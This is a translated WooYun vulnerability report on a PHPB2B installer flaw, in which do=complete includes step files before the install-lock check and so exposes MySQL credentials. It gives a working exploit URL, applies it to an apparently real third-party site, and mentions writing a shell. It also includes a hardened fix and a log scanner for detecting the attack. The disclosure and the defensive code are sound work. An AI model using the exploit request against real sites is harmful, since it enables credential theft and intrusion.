WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-02-11: Details reported to the vendor; awaiting vendor handling
2015-02-16: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-04-12: Details disclosed to core white hats and experts in related fields
2015-04-22: Details disclosed to ordinary white hats
2015-05-02: Details disclosed to intern white hats
2015-04-02: Details disclosed to the public
A flaw in PHPB2B allows the MySQL password to be viewed directly
Download the latest version from the official site and look at the code of the installer file install/install.php.
<?php
/**
 * [PHPB2B] Copyright (C) 2007-2099, Ualink Inc. All Rights Reserved.
 * The contents of this file are subject to the License; you may not use this file except in compliance with the License.
 *
 * @version $Revision: 2048 $
 */
session_start();
error_reporting(E_ERROR | E_NOTICE);
set_magic_quotes_runtime(0);
ini_set('magic_quotes_sybase', 0);
ini_set('max_execution_time', '300');
if (isset($_GET['act'])) {
    if($_GET['act'] == "phpinfo"){
        die(phpinfo());
    }
}
if (!defined('DIRECTORY_SEPARATOR')) {
    define('DIRECTORY_SEPARATOR','/');
}
define('DS', DIRECTORY_SEPARATOR);
define('TIME', time());
define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
define('PHPB2B_ROOT', substr(dirname(__FILE__), 0, -7));
define('MIN_PHP_VERSION', '5.0.0');
//define('JSMIN_AS_LIB', true); // prevents auto-run on include
require '../phpb2b_version.php';
require '../configs/config.inc.php';
require '../libraries/core/paths.php';
if (version_compare(PHP_VERSION, MIN_PHP_VERSION, '<')) {
    echo 'PHPB2B '. PHPB2B_VERSION. ' require php'. MIN_PHP_VERSION.', but your php version is ' . PHP_VERSION . ".\n";
    exit;
}
define('IN_PHPB2B',true);
if(!defined('LIB_PATH')) define('LIB_PATH',PHPB2B_ROOT.'libraries'.DS);
require '../libraries/global.func.php';
require '../libraries/func.sql.php';
require "../libraries/db_mysql.inc.php";
require "../libraries/core/object.php";
require "../libraries/core/controller.php";
require "../libraries/file.class.php";
require "../libraries/template.class.php";
require "../libraries/source/error.class.php";
list($accept_language) = explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']);
if(file_exists(PHPB2B_ROOT. 'languages'.DS.strtolower($accept_language).DS."global.csv")) {
    $app_lang = strtolower($accept_language);
}
if (!is_writable(PHPB2B_ROOT."data".DS)) {
    echo PHPB2B_ROOT."data".DS. " is not writeable.\n";
    exit;
}
if (!empty($_GET['app_lang'])) {
    $app_lang = $_GET['app_lang'];
}
if (!is_file(PHPB2B_ROOT."data".DS."language".DS.$app_lang.DS."default.conf")) {
    pb_configmake($app_lang);
}
if (!defined('CACHE_PATH')) {
    define('CACHE_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS);
    define('CACHE_LANG_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS);
    define('CACHE_COMMON_PATH', PHPB2B_ROOT."data".DS."cache".DS);
}
//language
$smarty = new TemplateEngines();
$sections = array('install', 'javascript');
//da($smarty);
$smarty->configLoad('default.conf', $sections);
$arrTemplate = $smarty->getConfigVars();
extract($arrTemplate);
//:~
$db = new DB_Sql();
$file_cls = new Files();
$pb_protocol = 'http';
if ( isset( $_SERVER['HTTPS'] ) && ( strtolower( $_SERVER['HTTPS'] ) != 'off' ) ) {
    $pb_protocol = 'https';
}
$PHP_SELF = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : preg_replace("/(.*)\.php(.*)/i", "\\1.php", $_SERVER['PHP_SELF']);
$BASESCRIPT = basename($PHP_SELF);
list($BASEFILENAME) = explode('.', $BASESCRIPT);
$install_url = htmlspecialchars($pb_protocol."://".pb_getenv('HTTP_HOST').preg_replace("/\/+(api|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');
$siteUrl = substr($install_url,0,-(strlen($BASEFILENAME)+1));
$time_stamp = TIME;
if($_REQUEST){
    if(!MAGIC_QUOTES_GPC) {
        $_REQUEST = pb_addslashes($_REQUEST);
        if($_COOKIE) $_COOKIE = pb_addslashes($_COOKIE);
    }
    extract($_REQUEST, EXTR_SKIP);
}
if(!isset($_GET['step'])) {
    $step = '1';
}else{
    $step = intval($_GET['step']);
}
// do=complete includes the step file right here, before the lock check below
if (isset($_GET['do'])) {
    $do = trim($_GET['do']);
    if($do == "complete"){
        include "step".$step.".inc.php";
        exit;
    }
}
// the install.lock check only runs after the include above has already exited
if(file_exists(PHPB2B_ROOT.'data/install.lock')) {
    $msg = L("install_locked", "tpl");
    Errors::showError($msg);
    exit;
}
Simply passing do=complete is enough to include the step file, yet the permission check only comes at lines 104-108:
if(file_exists(PHPB2B_ROOT.'data/install.lock')) {
    $msg = L("install_locked", "tpl");
    Errors::showError($msg);
    exit;
}
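The root cause is ordering: the lock-file check sits after the only code path that includes a step file, so it never protects that path. As an added example (not PHPB2B's own code), the prologue below reorders the checks so the lock is tested before anything user-controlled is included, validates the step number against the files the installer actually ships, and ties step progression to the session so a request cannot jump straight to a late step. PHPB2B_ROOT and the step file layout are taken from the code above; MAX_INSTALL_STEP and the session key are assumptions.

```php
<?php
// Added example, not from PHPB2B: a hardened replacement for the tail of
// install/install.php shown above. Assumes the same PHPB2B_ROOT layout and
// step<N>.inc.php naming; MAX_INSTALL_STEP and $_SESSION['install_step']
// are assumed names introduced here.
session_start();
define('DS', DIRECTORY_SEPARATOR);
define('PHPB2B_ROOT', substr(dirname(__FILE__), 0, -7));
define('MAX_INSTALL_STEP', 5); // assumed: highest shipped step file

// 1. The lock check runs first, before any config is loaded or any step
//    file is included. Once data/install.lock exists, nothing else runs.
if (file_exists(PHPB2B_ROOT . 'data' . DS . 'install.lock')) {
    header('HTTP/1.1 403 Forbidden');
    echo "Installation is locked. Remove the install/ directory.\n";
    exit;
}

// 2. Validate the step number: an integer in the shipped range only.
$step = isset($_GET['step']) ? intval($_GET['step']) : 1;
if ($step < 1 || $step > MAX_INSTALL_STEP) {
    header('HTTP/1.1 400 Bad Request');
    exit;
}

// 3. Steps must be completed in order within one session. A fresh client
//    cannot request step=5&do=complete without having passed steps 1-4.
$reached = isset($_SESSION['install_step']) ? (int) $_SESSION['install_step'] : 1;
if ($step > $reached) {
    header('HTTP/1.1 403 Forbidden');
    echo "Complete step $reached first.\n";
    exit;
}

// 4. Resolve the include path from the validated integer and confirm the
//    file really lives inside this installer directory.
$install_dir = realpath(dirname(__FILE__));
$step_file   = realpath($install_dir . DS . 'step' . $step . '.inc.php');
if ($step_file === false || strpos($step_file, $install_dir . DS) !== 0) {
    header('HTTP/1.1 404 Not Found');
    exit;
}

if (isset($_GET['do']) && trim($_GET['do']) === 'complete') {
    include $step_file;
    // Only after a step file ran successfully does the session advance.
    $_SESSION['install_step'] = min($step + 1, MAX_INSTALL_STEP);
    exit;
}
```

The ordering change alone closes the issue described in this report; the range and session checks are defence in depth so that a future reordering of the file does not silently reopen it. The real fix for deployed sites remains removing the install/ directory after setup.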
So although we cannot reinstall, we can still obtain important information, such as the MySQL database account and password!! Demonstrated on a local machine: http://127.0.0.1/phpb2b/install/install.php?step=5&app_lang=zh-cn&do=complete
Because install.php is not deleted by default, any site that has installed phpb2b is certain to expose its MySQL password; if remote connections or phpMyAdmin are enabled, one can grab the admin password directly, write a shell, and all the rest you can imagine. Because the official site has removed the install folder, it cannot be demonstrated there; a random site found online: http://en.csjci.com/install/install.php?step=5&app_lang=zh-cn&do=complete
And it is root, too~
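For operators who already run PHPB2B, the immediate question is whether the installer was ever reached this way on their own servers. As an added example (not part of the report), the scanner below reads combined-format access log lines and flags any request to install/install.php that carries do=complete, reporting the step that was reached. The log lines are constructed for the example; the find_install_probes name is an assumption.

```php
<?php
// Added example, not from the report: audit a web server access log for
// requests that reached install/install.php with do=complete.
// Log lines below are constructed; find_install_probes is an assumed name.
function find_install_probes(array $lines): array
{
    $hits = array();
    foreach ($lines as $n => $line) {
        // Pull the request target out of the quoted request line.
        if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $url = parse_url($m[1]);
        if (empty($url['path']) || !preg_match('#/install/install\.php$#i', $url['path'])) {
            continue;
        }
        $query = array();
        parse_str(isset($url['query']) ? $url['query'] : '', $query);
        if (isset($query['do']) && $query['do'] === 'complete') {
            $hits[] = array(
                'line' => $n + 1,
                'step' => isset($query['step']) ? (int) $query['step'] : 1,
                'raw'  => $line,
            );
        }
    }
    return $hits;
}

// Constructed sample: one benign hit, one installer probe, one ordinary step view.
$sample = array(
    '203.0.113.5 - - [02/Apr/2015:10:23:01 +0800] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [02/Apr/2015:10:23:02 +0800] "GET /install/install.php?step=5&app_lang=zh-cn&do=complete HTTP/1.1" 200 2048',
    '198.51.100.9 - - [02/Apr/2015:10:24:00 +0800] "GET /install/install.php?step=1 HTTP/1.1" 200 1024',
);

foreach (find_install_probes($sample) as $hit) {
    printf("line %d: installer reached with do=complete, step=%d\n", $hit['line'], $hit['step']);
}
```

Any hit on a site whose installation finished long ago means the response body (and therefore the database credentials) must be treated as disclosed: rotate the MySQL password and confirm the install/ directory is gone.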
Fix suggestion: filter.
Severity: no impact (vendor ignored)
Ignored at: 2015-04-02 10:23
None yet